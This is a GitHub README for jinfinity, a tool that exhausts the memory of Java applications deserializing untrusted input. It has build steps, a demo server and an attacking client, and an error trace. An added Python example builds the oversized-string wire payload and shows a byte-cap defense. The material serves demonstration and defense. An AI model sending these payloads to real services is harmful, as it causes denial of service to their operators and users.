https://github.com/contrast-security-oss/jinfinity

An API for consuming all the memory of Java apps using deserialization


jinfinity
========

An API and demonstration program for consuming all the memory of applications that deserialize data from untrusted sources (like HTTP requests) using the Java serialization specification.

## How do I use this?

Use the `com.contrastsecurity.jinfinity.JInfinity#sendAttack()` API to push an unreasonably large serialized String to a target `OutputStream`. Getting an `OutputStream` that is wired to your target (for example, the body of an HTTP request to an endpoint that deserializes it) is up to you.

## How can I run the demo program?

First, build the app:

```
git clone https://github.com/Contrast-Security-OSS/jinfinity.git
cd jinfinity
mvn clean package
```

To run the demo Jetty server, run this:
```
java -jar target/jinfinity-jar-with-dependencies.jar server
```

In another console, run the attacking client:
```
java -jar target/jinfinity-jar-with-dependencies.jar client
```

Within 30 seconds (sooner or later depending on the server's heap size), the server will produce an OutOfMemoryError that looks something like this:

```
java.lang.OutOfMemoryError: Java heap space
    at java.lang.AbstractStringBuilder.expandCapacity(AbstractStringBuilder.java:99)
    at java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:518)
    at java.lang.StringBuffer.append(StringBuffer.java:307)
    at java.io.ObjectInputStream$BlockDataInputStream.readUTFSpan(ObjectInputStream.java:3044)
    at java.io.ObjectInputStream$BlockDataInputStream.readUTFBody(ObjectInputStream.java:2952)
    at java.io.ObjectInputStream$BlockDataInputStream.readLongUTF(ObjectInputStream.java:2935)
    at java.io.ObjectInputStream.readString(ObjectInputStream.java:1570)
```
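The bytes that `sendAttack()` pushes, and the `readLongUTF` frame in the trace above, come down to one feature of the serialization wire format: a String longer than 65535 UTF bytes is written as type code `TC_LONGSTRING` (0x7C) followed by an 8-byte length, and `ObjectInputStream` appends the body into a `StringBuffer` until that length arrives. The following is an added example written for this page, not code from the jinfinity project. It is in Python because it is about the wire format rather than the Java API: it builds the same prefix `ObjectOutputStream.writeObject(String)` emits, models the trusting receiver, and shows the mitigation a practitioner wants, a hard cap on bytes consumed from the transport before the deserializer sees them. The class and function names, the 64 KiB chunk size and the cap values are this example's own choices.

```python
"""
Wire layout of the "unreasonably large String" serialization attack.

Added example, not code from the jinfinity project. Constants are the ones
from java.io.ObjectStreamConstants; everything else (names, CHUNK, the demo
sizes) is an assumption made for this illustration.
"""
import struct

STREAM_MAGIC = 0xACED    # java.io.ObjectStreamConstants.STREAM_MAGIC
STREAM_VERSION = 5       # java.io.ObjectStreamConstants.STREAM_VERSION
TC_LONGSTRING = 0x7C     # String with a u8 length; TC_STRING (0x74, u2 length) is used below 65536 bytes
CHUNK = 64 * 1024        # read granularity used by the model receiver (assumption)


def long_string_prefix(declared_len: int) -> bytes:
    """Stream header, TC_LONGSTRING tag and 8-byte big-endian length: 13 bytes.
    The body that follows is declared_len bytes of modified UTF-8."""
    if declared_len <= 0xFFFF:
        raise ValueError("ObjectOutputStream uses TC_STRING below 65536 bytes")
    return struct.pack(">HHBQ", STREAM_MAGIC, STREAM_VERSION, TC_LONGSTRING, declared_len)


def parse_long_string_header(prefix: bytes) -> int:
    """Decode the 13-byte prefix and return the declared body length."""
    magic, version, tag, length = struct.unpack(">HHBQ", prefix[:13])
    if magic != STREAM_MAGIC or version != STREAM_VERSION:
        raise ValueError("not a Java serialization stream")
    if tag != TC_LONGSTRING:
        raise ValueError(f"unexpected type code 0x{tag:02x}")
    return length


class AttackStream:
    """What the client sends: the prefix, then declared_len bytes of 'A'
    generated on demand. 'A' is one byte in modified UTF-8, so the receiver
    ends up with a String of declared_len chars. The sender never holds the
    body in memory; only the receiver does."""

    def __init__(self, declared_len: int):
        self.pending = long_string_prefix(declared_len)
        self.remaining = declared_len

    def read(self, n: int) -> bytes:
        if self.pending:
            out, self.pending = self.pending[:n], self.pending[n:]
            return out
        n = min(n, self.remaining)
        self.remaining -= n
        return b"A" * n


def read_long_string(stream) -> str:
    """Receiver modelled on ObjectInputStream$BlockDataInputStream.readLongUTF:
    trust the declared length and keep appending until it has all arrived.
    With a multi-gigabyte declared length this is the OutOfMemoryError path."""
    length = parse_long_string_header(stream.read(13))
    buf = bytearray()
    while len(buf) < length:
        piece = stream.read(min(CHUNK, length - len(buf)))
        if not piece:
            raise EOFError("stream ended before the declared length")
        buf += piece
    return buf.decode("ascii")


class TooMuchInput(Exception):
    pass


class CappedStream:
    """Mitigation: wrap the transport stream so that reading past max_bytes
    fails, whatever the serialized data claims about its own size. This is
    the equivalent of a counting InputStream placed in front of
    ObjectInputStream; unlike a check on the header alone, it also catches a
    long String nested inside some other object later in the stream."""

    def __init__(self, inner, max_bytes: int):
        self.inner = inner
        self.max_bytes = max_bytes
        self.consumed = 0

    def read(self, n: int) -> bytes:
        data = self.inner.read(n)
        self.consumed += len(data)
        if self.consumed > self.max_bytes:
            raise TooMuchInput(f"read {self.consumed} bytes, cap is {self.max_bytes}")
        return data


def demo_capped(declared_len: int, max_bytes: int) -> int:
    """Feed an attack stream through the cap; return the bytes consumed before it refused."""
    capped = CappedStream(AttackStream(declared_len), max_bytes)
    try:
        read_long_string(capped)
    except TooMuchInput:
        return capped.consumed
    raise AssertionError("cap was never hit")


if __name__ == "__main__":
    print(long_string_prefix(70_000).hex())          # aced 0005 7c 0000000000011170
    print(len(read_long_string(AttackStream(70_000))))
    print(demo_capped(1 << 40, 1 << 20))             # a 1 TiB claim stops after ~1 MiB
```

The cap is the point: the declared length in the header is attacker-controlled and arrives before a single byte of the body, so any defense that trusts it (or that only inspects the first object in the stream) can be bypassed by nesting the String inside another object. Bounding what you read from the socket is a property of the transport, not of the data, and holds regardless of what the stream claims. The better answer is still not to deserialize untrusted input at all.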